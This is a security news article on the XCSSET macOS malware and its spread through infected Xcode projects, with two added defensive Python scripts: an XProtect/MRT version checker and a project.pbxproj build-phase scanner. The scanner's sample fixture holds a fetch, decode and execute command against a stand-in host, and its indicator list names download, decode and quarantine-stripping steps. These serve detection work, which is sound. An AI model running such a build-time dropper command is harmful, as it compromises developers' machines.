The operators of the XCSSET macOS malware have ported the malware's source code components to Python 3, a considerable update that also lets it run on macOS Monterey, which from version 12.3 no longer ships the Python 2.7 interpreter earlier versions relied on.
According to a report by SentinelOne researchers Phil Stokes and Dinesh Devadoss, the malware authors no longer hide the primary executable in a fake Xcode.app as in the initial 2020 version, nor in a fake Mail.app as in 2021. The current version uses a fake Notes.app.
The malware was first documented by Trend Micro in 2020. At that time it could harvest sensitive information from WeChat, Skype, Telegram and Apple Notes, dump cookies from the Safari browser, and inject malicious JavaScript into websites.
The infection chain relies on a dropper that compromises a user's Xcode projects with a backdoor; the backdoor evades detection by masquerading as system software or as the Google Chrome browser.
The threat actor uses a custom AppleScript, listing.applescript, to determine which versions of Apple's XProtect and the Malware Removal Tool (MRT) are installed on the victim's machine. Knowing how current the built-in protections are lets the attackers select payloads that are more likely to evade them, according to the researchers.
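The version check described above, reproduced from the defender's side as an added example (not SentinelOne's analysis code or the malware's own script): it reads the CFBundleShortVersionString of the XProtect and MRT bundles with Python's plistlib and compares them against a baseline you consider current. The bundle paths are assumed to follow the current macOS layout, and the sample plists and version numbers are constructed for illustration, not Apple's current values.

```python
"""Defender-side check of the two data points XCSSET's listing.applescript
profiles: the installed XProtect and MRT versions.  Added example, not
SentinelOne's or the malware's code."""
import plistlib
from pathlib import Path

# Locations of the two bundles on recent macOS releases (assumption: the
# current layout; older systems kept them under /System/Library/CoreServices).
XPROTECT_PLIST = Path("/Library/Apple/System/Library/CoreServices/XProtect.bundle/Contents/Info.plist")
MRT_PLIST = Path("/Library/Apple/System/Library/CoreServices/MRT.app/Contents/Info.plist")

# Constructed sample Info.plist contents so the functions can be exercised
# off-macOS.  The version numbers are illustrative, not Apple's current ones.
SAMPLE_XPROTECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>CFBundleIdentifier</key>
  <string>com.apple.XProtect</string>
  <key>CFBundleShortVersionString</key>
  <string>2164</string>
</dict>
</plist>
"""
SAMPLE_MRT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>CFBundleIdentifier</key>
  <string>com.apple.MRT</string>
  <key>CFBundleShortVersionString</key>
  <string>1.93</string>
</dict>
</plist>
"""


def bundle_version(plist_bytes: bytes) -> str:
    """Return the bundle's short version string (falling back to CFBundleVersion)."""
    info = plistlib.loads(plist_bytes)
    return str(info.get("CFBundleShortVersionString") or info.get("CFBundleVersion") or "unknown")


def version_tuple(version: str) -> tuple:
    """Turn '1.93' into (1, 93) so versions compare numerically; non-numeric parts count as 0."""
    return tuple(int(p) if p.isdigit() else 0 for p in version.split("."))


def is_outdated(installed: str, baseline: str) -> bool:
    """True when the installed version is below the baseline you consider current."""
    return version_tuple(installed) < version_tuple(baseline)


def check_installed(baselines: dict) -> dict:
    """Read the live plists (macOS only) and compare each against its baseline.
    On a non-macOS host the paths do not exist and both entries report None."""
    report = {}
    for name, path in (("XProtect", XPROTECT_PLIST), ("MRT", MRT_PLIST)):
        if not path.is_file():
            report[name] = {"installed": None, "outdated": None}
            continue
        installed = bundle_version(path.read_bytes())
        report[name] = {"installed": installed, "outdated": is_outdated(installed, baselines[name])}
    return report


if __name__ == "__main__":
    # Baselines are whatever your fleet considers current; these are placeholders.
    for name, entry in check_installed({"XProtect": "2164", "MRT": "1.93"}).items():
        print(f"{name}: installed={entry['installed']} outdated={entry['outdated']}")
```

If the malware bothers to profile these versions before choosing a payload, a fleet-wide report of hosts whose XProtect or MRT lags the baseline is a cheap way to find the machines it would most like to land on.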
One of the unusual aspects of the attacks is that the malware is delivered through infected Xcode projects, which developers commonly share through GitHub repositories, so every shared project becomes a propagation vector and extends the malware's reach.
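The Xcode project compromise described in the two passages above, as an added detection example that is not part of the SentinelOne or Trend Micro research: the page does not describe how the dropper modifies a project, so this assumes the usual place a project can execute arbitrary commands, a Run Script build phase (PBXShellScriptBuildPhase) in project.pbxproj, and flags scripts that fetch, decode or launch something at build time. The indicator list is a hypothetical heuristic, not an XCSSET signature, and the sample pbxproj fragment is constructed.

```python
"""Scan an Xcode project.pbxproj for Run Script build phases that behave like
droppers.  Added example; not code from the SentinelOne or Trend Micro research.
Assumption: the backdoor rides in a PBXShellScriptBuildPhase whose shell script
downloads and runs something at build time.  The indicators are a hypothetical
heuristic, not an XCSSET signature."""
import re
from pathlib import Path

# Constructed sample fragment of a project.pbxproj (old-style plist, not XML):
# one ordinary lint phase and one phase that fetches and executes a payload.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
    A1 /* ShellScript */ = {
      isa = PBXShellScriptBuildPhase;
      files = (
      );
      name = "Run SwiftLint";
      shellPath = /bin/sh;
      shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
    };
    B2 /* ShellScript */ = {
      isa = PBXShellScriptBuildPhase;
      files = (
      );
      name = "";
      shellPath = /bin/sh;
      shellScript = "curl -s http://example.invalid/x | base64 -d > /tmp/.x && chmod +x /tmp/.x && /tmp/.x\n";
    };
/* End PBXShellScriptBuildPhase section */
'''

# One object block: "<id> /* comment */ = { ... };" starting at the beginning of a line.
OBJECT_RE = re.compile(
    r'^[ \t]*(?P<id>[0-9A-F]+)[ \t]*(?:/\*.*?\*/)?[ \t]*=[ \t]*\{(?P<body>.*?)\};',
    re.M | re.S,
)

# Hypothetical indicators of a build phase acting as a dropper.
INDICATORS = [
    (r'\b(curl|wget)\b', "downloads content at build time"),
    (r'\bbase64\s+(-d|-D|--decode)\b', "decodes an embedded/base64 payload"),
    (r'\bosascript\b', "runs AppleScript"),
    (r'\beval\b', "evaluates dynamically built code"),
    (r'/(private/)?tmp/\.', "writes a hidden file under /tmp"),
    (r'\bxattr\s+-\w*d', "strips the quarantine attribute"),
    (r'\bchmod\s+\+x', "makes a file executable"),
]


def unescape(value: str) -> str:
    """Undo pbxproj string escaping: backslash-n, backslash-t, backslash-quote, doubled backslash."""
    return re.sub(r'\\(.)', lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), value)


def quoted_field(body: str, key: str) -> str:
    """Value of `key = "...";` inside an object body, unescaped; '' if absent."""
    m = re.search(rf'\b{key}\s*=\s*"((?:[^"\\]|\\.)*)"', body)
    return unescape(m.group(1)) if m else ""


def scan_pbxproj(text: str) -> list:
    """Return one record per PBXShellScriptBuildPhase with the indicators its script trips."""
    phases = []
    for m in OBJECT_RE.finditer(text):
        body = m.group("body")
        if not re.search(r'\bisa\s*=\s*PBXShellScriptBuildPhase\b', body):
            continue
        script = quoted_field(body, "shellScript")
        hits = [why for pattern, why in INDICATORS if re.search(pattern, script)]
        phases.append({"id": m.group("id"), "name": quoted_field(body, "name"),
                       "script": script, "hits": hits})
    return phases


def suspicious_phases(text: str) -> list:
    """IDs of build phases that trip at least one indicator."""
    return [p["id"] for p in scan_pbxproj(text) if p["hits"]]


if __name__ == "__main__":
    import sys
    # Usage: scan_pbxproj.py Foo.xcodeproj/project.pbxproj (defaults to the sample).
    text = Path(sys.argv[1]).read_text() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for p in scan_pbxproj(text):
        flag = "SUSPICIOUS" if p["hits"] else "ok"
        print(f"{p['id']} {p['name']!r}: {flag} {', '.join(p['hits'])}")
```

Run it against a freshly cloned project's *.xcodeproj/project.pbxproj before opening it in Xcode, since build phases execute on the first build; an unnamed phase that fetches and runs a remote script is worth reading by hand, and the heuristic will also flag legitimate dependency-fetching phases, which is the point of reviewing rather than auto-blocking.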
Although the malware has existed for two years, researchers still know little about the threat actors' identity, targets and motivations. Attacks were reported in China as recently as May 2022, with the threat actors demanding 200 USDT from victims to unlock the stolen accounts.
The researchers noted that it is unclear whether the infected users are genuine victims or plants seeded by the threat actors in the hope of infecting unwary users.